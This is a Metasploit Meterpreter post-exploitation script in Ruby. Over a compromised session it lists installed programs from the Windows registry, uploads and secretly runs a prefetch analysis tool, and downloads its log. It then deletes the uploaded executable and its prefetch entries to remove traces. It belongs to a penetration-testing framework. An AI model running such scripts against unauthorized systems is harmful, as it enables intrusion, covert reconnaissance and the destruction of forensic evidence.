metasploit-framework/scripts/meterpreter/prefetchtool.rb

160 lines
4.9 KiB
Ruby
Raw Normal View History

#!/usr/bin/env ruby
#Meterpreter script for extracting information from windows prefetch folder
#Provided by Milo at keith.lee2012[at]gmail.com
#Verion: 0.1.0
session = client
host,port = session.tunnel_peer.split(':')
# Script Options
@@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help menu."],
"-p" => [ false, "List Installed Programs"],
"-c" => [ false, "Disable SHA1/MD5 checksum"],
"-x" => [ true, "Top x Accessed Executables (Based on Prefetch folder)"],
"-d" => [ false, "Disable lookup for software name"],
"-l" => [ false, "Download Prefetch Folder Analysis Log"]
)
tmp = session.fs.file.expand_path("%TEMP%")
imgname = sprintf("%.5d",rand(100000))
runTop = nil
logs = ''
logs1 = ''
timeoutsec = 1000
#---------------------------------------------------------------------------------------------------------
def readprogramlist(session)
begin
key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', KEY_READ)
sfmsvals = key.enum_key
sfmsvals.each do |test1|
begin
key2 = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\"+test1
root_key2, base_key2 = session.sys.registry.splitkey(key2)
value1 = "DisplayName"
value2 = "DisplayVersion"
open_key = session.sys.registry.open_key(root_key2, base_key2, KEY_READ)
v1 = open_key.query_value(value1)
v2 = open_key.query_value(value2)
print_status("#{v1.data}\t(Version: #{v2.data})")
rescue
end
end
end
end
def prefetchdump(session,tmp,imgname,options,logs1,timeoutsec)
tmpout = []
prefetchexe = File.join(Msf::Config.install_root, "data", "prefetch.exe")
prefetchlog = sprintf("%.5d",rand(100000))
print_status("Uploading Prefetch-tool for analyzing Prefetch folder....")
begin
session.fs.file.upload_file("#{tmp}\\#{prefetchlog}.exe","#{prefetchexe}")
print_status("Prefetch-tool uploaded as #{tmp}\\#{prefetchlog}.exe")
rescue::Exception => e
print_status("The following Error was encountered: #{e.class} #{e}")
end
session.response_timeout=timeoutsec
if logs1!=''
session = client
host,port = session.tunnel_peer.split(':')
logs = ::File.join(Msf::Config.config_directory, 'logs', 'prefetch', host + "-"+ ::Time.now.strftime("%Y%m%d.%M%S"))
::FileUtils.mkdir_p(logs)
print "[*] Saving prefetch logs to #{tmp}\\#{imgname} "
end
print_status("Prefetch-tool executing...")
begin
r = session.sys.process.execute("cmd.exe /c #{tmp}\\#{prefetchlog}.exe #{options} #{logs1}.txt", nil, {'Hidden' => 'true','Channelized' => true})
while(d = r.channel.read)
print_status d
end
sleep(2)
prog2check = "#{prefetchlog}.exe"
found = 0
while found == 0
session.sys.process.get_processes().each do |x|
found =1
if prog2check == (x['name'].downcase)
print "."
sleep(0.5)
found = 0
end
end
end
r.channel.close
r.close
print "\n"
if logs1!=""
print_status("Finish extracting prefetch folder data")
end
print_status("Deleting #{prefetchlog}.exe from target...")
session.sys.process.execute("cmd.exe /c del #{tmp}\\#{prefetchlog}.exe", nil, {'Hidden' => 'true'})
session.sys.process.execute("cmd.exe /c del %windir%\\prefetch\\#{prefetchlog}*.pf", nil, {'Hidden' => 'true'})
print_status("Clearing prefetch-tool prefetch entry ...")
rescue::Exception => e
print_status("The following error was encountered: #{e.class} #{e}")
end
return logs
end
#---------------------------------------------------------------------------------------------------------
def logdown(session,tmp,imgname,logs,timeoutsec)
session.response_timeout=timeoutsec
print_status("Downloading prefetch-tool logs to #{logs}")
begin
session.fs.file.download_file("#{logs}#{::File::Separator}#{imgname}.txt", "#{tmp}\\#{imgname}.txt")
print_status("Finished downloading prefetch-tool log")
print_status("Deleting left over files...")
session.sys.process.execute("cmd.exe /c del #{tmp}\\#{imgname}", nil, {'Hidden' => 'true'})
print_status("Prefetch-tool log on target deleted")
rescue::Exception => e
print_status("The following Error was encountered: #{e.class} #{e}")
end
end
################## MAIN ##################
# Parsing of Option
checksum = 1
inetlookup = 1
hlp = 0
dwld = 0
options1 = ""
viewPrograms = 0
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-x"
options1 += " --x="+val
when "-c"
options1 += " --disable-md5 --disable-sha1"
when "-p"
viewPrograms = 1
hlp = 1
when "-d"
options1 += " --disable-lookup"
when "-l"
logs1 = " --txt=#{tmp}\\#{imgname}"
dwld = 1
when "-h"
hlp = 1
print(
"Prefetch-tool Meterpreter Script\n" +
@@exec_opts.usage
)
break
end
}
if (viewPrograms == 1)
readprogramlist(session)
end
if (hlp == 0)
print_status("Running Prefetch-tool Script.....")
logs2 = prefetchdump(session,tmp,imgname,options1,logs1,timeoutsec)
if (dwld == 1)
logdown(session,tmp,imgname,logs2,timeoutsec)
end
end